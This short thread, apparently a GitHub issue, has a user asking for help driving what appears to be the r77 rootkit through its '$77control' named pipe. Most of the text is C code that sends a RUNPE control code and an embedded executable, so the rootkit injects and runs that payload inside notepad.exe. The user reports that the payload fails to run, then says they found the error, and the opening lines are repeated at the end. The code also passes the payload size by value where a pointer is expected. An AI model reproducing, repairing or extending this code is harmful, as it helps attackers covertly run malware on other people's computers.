Closed ghost closed 1 year ago
I've tried this using the examples provided. the PE is in resources
HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (pipe != INVALID_HANDLE_VALUE) { LPBYTE pe; DWORD peSize; if (!GetResource(IDR_R72, "EXE", &pe, &peSize)) return 0; DWORD controlCode = CONTROL_USER_RUNPE; WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe"; // Write control code (DWORD) DWORD bytesWritten; WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL); // Write the path for ShellExec (unicode string including null terminator) WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL); // Write arguments for size WriteFile(pipe, peSize, sizeof(DWORD), &bytesWritten, NULL); // Write arguments for bytes WriteFile(pipe, pe, peSize, &bytesWritten, NULL); CloseHandle(pipe); }
but the PE does not execute.
nvm, found the error. Thanks
I've tried this using the examples provided. the PE is in resources
but the PE does not execute.